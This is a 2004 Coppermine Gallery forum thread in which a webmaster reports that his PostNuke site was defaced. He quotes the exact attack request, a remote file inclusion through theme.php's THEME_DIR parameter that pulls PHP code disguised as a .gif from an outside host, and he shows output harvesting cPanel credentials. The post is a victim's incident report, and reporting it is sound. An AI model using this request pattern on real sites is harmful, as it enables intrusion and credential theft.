PostNuke Coppermine Gallery Security Error PostNuke Coppermine Gallery Security Error
 

News:

CPG Release 1.6.26
Correct PHP8.2 issues with user and language managers.
Additional fixes for PHP 8.2
Correct PHP8 error with SMF 2.0 bridge.
Correct IPTC supplimental category parsing.
Download and info HERE

Main Menu

PostNuke Coppermine Gallery Security Error

Started by PsyVision, October 12, 2004, 01:35:33 PM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

Print
Go Down Pages1
User actions

PsyVision

October 12, 2004, 01:35:33 PM Last Edit: October 13, 2004, 12:20:18 AM by GauGau
hey,

I run a website www.dustify.net. Last night someone has used coppermine to execute a php script to deface the front page of the website by accessing the postnuke username/password.

"http://www.dustify.net/modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.webfontes.com.br/priv8/cmd.gif?&nick=MaMa&op=coppermine"

is the request that was put through our webserver. The error is in "http://www.dustify.net/modules/coppermine/themes/default/theme.php" and the file "http://www.webfontes.com.br/priv8/cmd.gif" is not an image, it contains PHP code to break into several security flaws in several image galleries.

The result of executing the script is:

"Possível Login cPanel: **** Possível Senha: ****
Admins:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in http://www.webfontes.com.br/priv8/cmd.gif?/user_list_info_box.inc on line 251

Site Ownado!"

Has anyone else had this problem?

Tranz

#1
October 12, 2004, 04:42:41 PM Last Edit: October 12, 2004, 04:48:36 PM by TranzNDance
Print
Go Up Pages1
User actions